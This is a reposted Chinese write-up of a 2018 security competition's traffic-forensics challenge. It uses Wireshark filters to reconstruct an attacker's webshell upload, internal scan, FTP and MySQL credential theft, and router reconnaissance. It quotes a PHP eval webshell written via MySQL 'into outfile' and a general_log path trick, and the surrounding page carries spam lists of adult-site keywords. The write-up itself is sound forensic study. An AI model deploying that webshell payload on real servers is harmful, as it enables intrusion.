日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解

發布時間:2024/3/13 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

本文原創作者:一葉飄零

目錄

題目描述

第一個數據包

第三個數據包

第四個數據包

路由器hacking

后記

題目描述

1.黑客的IP是多少

2.服務器1.99的web服務器使用的CMS及其版本號(請直接復制)

3.服務器拿到的webshell的網址(請輸入url解碼后的網址)

4.服務器1.99的主機名

5.網站根目錄的絕對路徑(注意最后加斜杠)

6.黑客上傳的第一個文件名稱是什么

7.黑客進行內網掃描,掃描的端口都有哪些(端口從小到大,用英文逗號分隔)

8.服務器2.88的ftp服務賬號密碼(格式:賬號/密碼)

9.黑客成功登陸ftp的時間(格式:10:15:36)

10.黑客在ftp中下載的敏感文件名稱是什么

11.服務器2.88中用戶名為admin_zz的web后臺管理員的密碼

12.服務器2.88的mysql賬號密碼(格式:賬號/密碼)

13.服務器2.88的mysql服務中有和admin有關的三個表,請按照黑客的查詢順序作答,使用空格分隔

14.請列出黑客設置的genreal log的絕對路徑(將路徑復制出來,區分大小寫)

15.路由器的品牌、型號、版本(請直接復制粘貼)

16.列出路由器的所有IP地址(格式:從小到大,用英文逗號分隔)

17.在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4

18.路由器一共有幾個接口?其中有幾個WAN口啟用?有幾個LAN口啟用(格式:用英文逗號分隔)

19.路由器的系統路由表中一共有幾條?第三條的子網掩碼是多少。例: 255 255.255.0則為24 (格式:用英文逗號分隔)

20.路由器的5Gwif名稱是什么,信道是多少(格式:名稱信道)

題目文件:

密碼: shna

第一個數據包

上來先過濾http流量,隨意瀏覽

可以發現202.1.1.2執行了phpinfo()命令

無疑是黑客ip,而192.168.1.99顯然就是受害者了

我們進一步利用這一特點,進行過濾

(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.99) && http

為確定服務器使用的CMS和版本號,我們抽取一個192.168.1.99的響應,看看前端響應里會不會包含

隨意跟蹤一個ip.src==192.168.1.99的http響應

我們定位到Powered by

不難發現

版本號和CMS一目了然

EasyTalk X2.0.1

同時利用

(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.99) && http

過濾不難看出有如下url

解碼后得到

即可利用的webshell

隨后想起有phpinfo,即可以泄露大量服務器信息,我們去拷貝下響應的html源碼

保存到本地,打開即可看到許多信息

服務器1.99的主機名和網站根目錄的絕對路徑一目了然

答案分別為

simplefight1

/var/www/html/easytalk

接著既然要找出上傳文件,于是使用過濾

ip.addr == 202.1.1.2 && http.request.method == POST

不然找到如下信息

解碼z1查看文件名

/var/www/html/easytalk/scan.php

發現為scan.php

顧名思義,掃描,于是我們過濾這個文件,查看黑客的掃描

ip.addr == 202.1.1.2 && http contains "scan.php"

問題一目了然

可見起始ip:192.168.0.1

結束ip:192.168.3.255

掃描端口:21,80,8080,1433,3306

至此我們歸納一下答案

1.黑客的IP是多少

202.1.1.2

2.服務器1.99的web服務器使用的CMS及其版本號(請直接復制)

EasyTalk X2.0.1

3.服務器拿到的webshell的網址(請輸入url解碼后的網址)

4.服務器1.99的主機名

simplefight1

5.網站根目錄的絕對路徑(注意最后加斜杠)

/var/www/html/easytalk

6.黑客上傳的第一個文件名稱是什么

scan.php

7.黑客進行內網掃描,掃描的端口都有哪些(端口從小到大,用英文逗號分隔)

21,80,8080,1433,3306

第二個數據包

既然要找ftp的賬號密碼,肯定是利用之前打下的機子作為跳板,進一步攻擊內網

那么此時我們只需要過濾

ip.src == 192.168.1.99 && ftp

即可查看所有登錄信息

選中最后一項

不難看出賬戶密碼為:`administrator:123456`

然后再過濾

ip.addr == 192.168.1.99 && ftp

找到對應密碼為123456登錄的消息

可以看到登錄時間

14:07:15

可以發現黑客在第二個數據包里只進行了操作

CWD 改變工作目錄

PWD 打印工作目錄,返回主機的當前目錄

PASV 進入被動模式

LIST 如果指定了文件或目錄,返回其信息;否則返回當前工作目錄的信息

而下載命令為

RETR 傳輸文件副本

所以我們切換到第三個數據包中

第三個數據包

我們根據之前的分析,使用命令

ip.src == 192.168.1.99 && ftp contains "RETR"

即可一目了然

下載文件名為

/phpStudy/WWW/config/config_db.php

我們跟進查看一下,畢竟是重要配置文件

ip.addr == 192.168.1.99 && ftp-data

可以得到配置php

/*

con_db_host = "localhost"

con_db_id = "root"

con_db_pass= "S1mp13zz"

con_db_name = "met"

tablepre = "met_"

db_charset = "utf8";

*/

?>

即mysql賬號密碼:`localhost/S1mp13zz`

下面我們去尋找admin_zz的密碼

ip.addr == 192.168.1.99 && http contains "admin_zz"

答案同樣一目了然

密碼為`1q2w3e4r`

然后需要我們查找admin相關的表,但是我們知道,表前綴為:`met_`

所以我們可以過濾

ip.addr == 192.168.1.99 && mysql contains "met_"

結果依舊顯然,正好3個查詢,3個有關管理員的表也出現了

select * from met_admin_array

select * from met_admin_column

select * from met_admin_table

met_admin_array,met_admin_column,met_admin_table

我們來總結一下這個階段的答案

8.服務器2.88的ftp服務賬號密碼(格式:賬號/密碼)

administrator:123456

9.黑客成功登陸ftp的時間(格式:10:15:36)

14:07:15

10.黑客在ftp中下載的敏感文件名稱是什么

config_db.php

11.服務器2.88中用戶名為admin_zz的web后臺管理員的密碼

1q2w3e4r

12.服務器2.88的mysql賬號密碼(格式:賬號/密碼)

localhost/S1mp13zz

13.服務器2.88的mysql服務中有和admin有關的三個表,請按照黑客的查詢順序作答,使用空格分隔

met_admin_array met_admin_column met_admin_table

第四個數據包

我們直接過濾

ip.addr == 192.168.1.99 && mysql

不難發現,黑客想在192.168.2.88的機器上留shell

select '<?php eval($_POST[a]);?>' into outfile 'c:/phpStudy/WWW/aaa.php'

但是返回了錯誤

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

于是黑客進行了一系列的更改

在后續的一條操作中,可以明顯看到

set global general_log_file='c:/phpStudy/WWW/config/config.php'

路徑為

c:/phpStudy/WWW/config/config.php

同時可以確定192.168.2.88為一臺windows

路由器hacking

剩下的5個題均為路由器的題,這就很難受了,之前一直很少接觸路由器的流量分析

后來轉念一想,路由器一般都是192.168.0.1吧

于是我查了一下這個ip

ip.addr == 192.168.0.1 && http

發現的確是有web服務的

我們進行查找

很快,在第一個返回200的包里就找到了答案

{ "id":1, "result":{ "locale":"zh_CN", "force":false, "radio":2, "model":"TL-WAR1300L v1.0" }, "error_code":"0" }

答案為

TL-WAR1300L v1.0

我們系統的看一下這些流量,不難發現,黑客先進行了密碼爆破

而之前的登錄error_code均為700

可見最后黑客成功登入

然后黑客進行了read選項

才有了如上的版本信息

然后我們看到黑客進行了如下操作

然后得到回顯{

"id": 1,

"result": {

"normal": [{

"py_isup": false,

"ipaddr": "",

"t_type": "ethernet",

"t_isup": "disconnect",

"t_name": "WAN1",

"t_linktype": "dhcp"

},{

"py_isup": false,

"ipaddr": "",

"t_type": "ethernet",

"t_isup": "disconnect",

"t_name": "WAN2",

"t_linktype": "dhcp"

},{

"py_isup": false,

"ipaddr": "",

"dhcp_status": "on",

"t_type": "ethernet",

"t_name": "LAN1",

"t_isup": "disconnect",

"t_linktype": "static"

}, {

"py_isup": false,

"ipaddr": "",

"dhcp_status": "on",

"t_type": "ethernet",

"t_name": "LAN2",

"t_isup": "disconnect",

"t_linktype": "static"

}, {

"py_isup": false,

"ipaddr": "",

"dhcp_status": "on",

"t_type": "ethernet",

"t_name": "LAN3",

"t_isup": "disconnect",

"t_linktype": "static"

}]

},

"error_code": "0"

}

目前2個wan和2個LAN都是關閉狀態,`py_isup`清晰可見

接著后面又出現了一個類似的內容

{

"id":1,

"result":{

"normal":[

{

"py_isup":true,

"ipaddr":"202.1.1.1",

"t_type":"ethernet",

"t_isup":"connect",

"t_name":"WAN1",

"t_linktype":"static"

},

{

"py_isup":true,

"ipaddr":"192.168.12.173",

"t_type":"ethernet",

"t_isup":"internet",

"t_name":"WAN2",

"t_linktype":"dhcp"

},

{

"py_isup":true,

"ipaddr":"192.168.0.1",

"dhcp_status":"on",

"t_type":"ethernet",

"t_name":"LAN1",

"t_isup":"connect",

"t_linktype":"static"

},

{

"py_isup":true,

"ipaddr":"192.168.0.1",

"dhcp_status":"on",

"t_type":"ethernet",

"t_name":"LAN2",

"t_isup":"connect",

"t_linktype":"static"

},

{

"py_isup":false,

"ipaddr":"192.168.0.1",

"dhcp_status":"on",

"t_type":"ethernet",

"t_name":"LAN3",

"t_isup":"disconnect",

"t_linktype":"static"

}

]

},

"error_code":"0"

}

此時可以發現一共有5個接口,其中WAN1、WAN2、LAN1、LAN2均被打開

并且ip為:

202.1.1.1

192.168.12.173

192.168.0.1

故此16,18題均被解答

然后是子網掩碼的問題,這里我選擇搜索網關相關內容

ip.addr == 192.168.0.1 && http contains "gateway"

然后可以發現如下數據

{

"id":1,

"result":[

{

"metric":"0",

"gateway":"192.168.12.254",

"mask":"0.0.0.0",

"dest":"0.0.0.0",

"interface":"WAN2"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.0.0.0",

"dest":"127.0.0.0",

"interface":"lo"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.252.0",

"dest":"192.168.0.0",

"interface":"LAN"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.255.0",

"dest":"192.168.12.0",

"interface":"WAN2"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.255.0",

"dest":"202.1.1.0",

"interface":"WAN1"

}

],

"error_code":"0"

}

所以一共有5條,第三條為{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.252.0",

"dest":"192.168.0.0",

"interface":"LAN"

}

子網掩碼為`255.255.252.0`

至此19題完結

然后最后問到信道,于是我的過濾為

ip.addr == 192.168.0.1 && http contains "channel"

得到數據{

"id":1,

"result":{

"1":{

"mssid":[

"test-ge1"

],

"wds":"off",

"channel":36,

"mode":"11anac mixed",

"radio_enable":"on",

"amount":0,

"frequency":"5G"

},

"0":{

"mssid":[

"test-ge1"

],

"wds":"off",

"channel":1,

"mode":"11bgn mixed",

"radio_enable":"on",

"amount":1,

"frequency":"2.4G"

},

"2":{

"mssid":[

"TP-LINK_GUEST_6258"

],

"amount":0,

"mode":"11bgn mixed",

"radio_enable":"off",

"frequency":"visitor"

}

},

"error_code":"0"

}

重點為"1":{

"mssid":[

"test-ge1"

],

"wds":"off",

"channel":36,

"mode":"11anac mixed",

"radio_enable":"on",

"amount":0,

"frequency":"5G"

}

可以清晰看到,名稱為`test-ge1`,信道為36

然后是最最蛇皮的17問:在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4

這個我可以說相當薄弱了,并不是很懂,但是其中提及端口,于是我的關鍵詞為

ip.addr == 192.168.0.1 && http contains "port"

數據并不是很多,看到最后有

{ "id":1, "result":{ "state":"on", "mode":"both", "mirroredports":[ "1", "2" ], "mirrorport":"3" }, "error_code":"0" }

可以斷定答案為

3-->1,2

最后階段歸納一下答案

14.請列出黑客設置的genreal log的絕對路徑(將路徑復制出來,區分大小寫)

c:/phpStudy/WWW/config/config.php

15.路由器的品牌、型號、版本(請直接復制粘貼)

TL-WAR1300L v1.0

16.列出路由器的所有IP地址(格式:從小到大,用英文逗號分隔)

192.168.0.1,192.168.12.173,202.1.1.1

17.在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4

3-->1,2

18.路由器一共有幾個接口?其中有幾個WAN口啟用?有幾個LAN口啟用(格式:用英文逗號分隔)

5,2,2

19.路由器的系統路由表中一共有幾條?第三條的子網掩碼是多少。例: 255 255.255.0則為24 (格式:用英文逗號分隔)

5,255.255.252.0

20.路由器的5Gwif名稱是什么,信道是多少(格式:名稱信道)

test-ge136

后記

最后完整答案為:

1.黑客的IP是多少

202.1.1.2

2.服務器1.99的web服務器使用的CMS及其版本號(請直接復制)

EasyTalk X2.0.1

3.服務器拿到的webshell的網址(請輸入url解碼后的網址)

4.服務器1.99的主機名

simplefight1

5.網站根目錄的絕對路徑(注意最后加斜杠)

/var/www/html/easytalk

6.黑客上傳的第一個文件名稱是什么

scan.php

7.黑客進行內網掃描,掃描的端口都有哪些(端口從小到大,用英文逗號分隔)

21,80,8080,1433,3306

8.服務器2.88的ftp服務賬號密碼(格式:賬號/密碼)

administrator:123456

9.黑客成功登陸ftp的時間(格式:10:15:36)

14:07:15

10.黑客在ftp中下載的敏感文件名稱是什么

config_db.php

11.服務器2.88中用戶名為admin_zz的web后臺管理員的密碼

1q2w3e4r

12.服務器2.88的mysql賬號密碼(格式:賬號/密碼)

localhost/S1mp13zz

13.服務器2.88的mysql服務中有和admin有關的三個表,請按照黑客的查詢順序作答,使用空格分隔

met_admin_array met_admin_column met_admin_table

14.請列出黑客設置的genreal log的絕對路徑(將路徑復制出來,區分大小寫)

c:/phpStudy/WWW/config/config.php

15.路由器的品牌、型號、版本(請直接復制粘貼)

TL-WAR1300L v1.0

16.列出路由器的所有IP地址(格式:從小到大,用英文逗號分隔)

192.168.0.1,192.168.12.173,202.1.1.1

17.在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4

3-->1,2

18.路由器一共有幾個接口?其中有幾個WAN口啟用?有幾個LAN口啟用(格式:用英文逗號分隔)

5,2,2

19.路由器的系統路由表中一共有幾條?第三條的子網掩碼是多少。例: 255 255.255.0則為24 (格式:用英文逗號分隔)

5,255.255.252.0

20.路由器的5Gwif名稱是什么,信道是多少(格式:名稱信道)

test-ge136

沒想到最后竟然突然來了個路由器hacking,完全摸不到邊,純靠題目轉英文進行過濾……

最蛇皮的是最后2個包都沒用到,希望可以加強自身各種類型的流量分析的能力吧= =

(注:本文屬于合天原創投稿獎勵,未經允許,禁止轉載!)

總結

以上是生活随笔為你收集整理的信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 尹人久久| 国产91区 | 中文字幕久久综合 | 调教驯服丰满美艳麻麻在线视频 | 涩色网 | 天天综合天天综合 | www在线视频| 香蕉视频一区二区三区 | www.天堂在线| 亚洲免费网站 | www.偷拍.com| 毛片哪里看 | 免费毛毛片 | 日韩激情综合网 | 欧美日韩精品一区二区 | 欧美日韩国产在线观看 | 日韩久久久精品 | 午夜影院毛片 | 日本我不卡 | 欧美一级片网址 | 欧美日韩 一区二区三区 | 国产成人精品一区二三区四区五区 | 日韩欧美综合视频 | 国产亚洲精品久久久久四川人 | 91免费版在线看 | 午夜激情毛片 | 小柔的淫辱日记(h | 求一个黄色网址 | 久久性精品 | 国产又粗又猛又爽又 | www在线观看视频 | av自拍 | 国产资源网| 成人免费视频国产免费麻豆 | 日本系列第一页 | 大香焦久久 | 精品国产成人av | 国产精品伦子伦免费视频 | 色大师在线观看 | 浮力影院国产第一页 | 国语对白精彩对话 | 天天干天天干天天操 | 自拍99页 | 天天综合网天天综合色 | 亚洲精品白虎 | xxxxx黄色 | 激情久久综合 | 激情久 | 欧美美女一级片 | 色婷婷精品国产一区二区三区 | 黄色大片91 | 日日夜夜草 | 中文无码熟妇人妻av在线 | 五月六月丁香 | 免费高清视频一区二区三区 | 国产精品免费无遮挡无码永久视频 | 成人av无码一区二区三区 | 国产精品主播视频 | 樱桃国产成人精品视频 | 久久毛片 | 青青草国产一区 | 人妻 校园 激情 另类 | 91精品国产91久久久久青草 | 在线 日本 制服 中文 欧美 | 日韩在线天堂 | 福利电影一区二区三区 | 亚洲区精品| 波多野吉衣视频在线观看 | 国产无套精品一区二区三区 | 华丽的外出在线观看 | 日本午夜电影 | 国产乱码视频 | 秋霞电影一区二区 | 性猛交xxxx乱大交孕妇2十 | 尤物一区 | 久久视频免费观看 | 强公把我次次高潮hd | 91成品视频 | 青青青av| 国内精品二区 | 欧美精品色呦呦 | 女生喷液视频 | 亚洲精品色午夜无码专区日韩 | 国产福利视频在线观看 | 国产五区 | 国产免费成人 | 国产a免费视频 | 97视频一区二区 | 意大利少妇愉情理伦片 | 波多野结衣av在线播放 | 精品少妇人妻av免费久久久 | 午夜国产一区二区三区 | 国产免费自拍 | 国产精品久久影院 | 日韩精品电影一区二区 | 色窝窝无码一区二区三区 | 精品人妻一区二区三区久久夜夜嗨 | 亚洲精品成人无码毛片 | 欧美 在线 |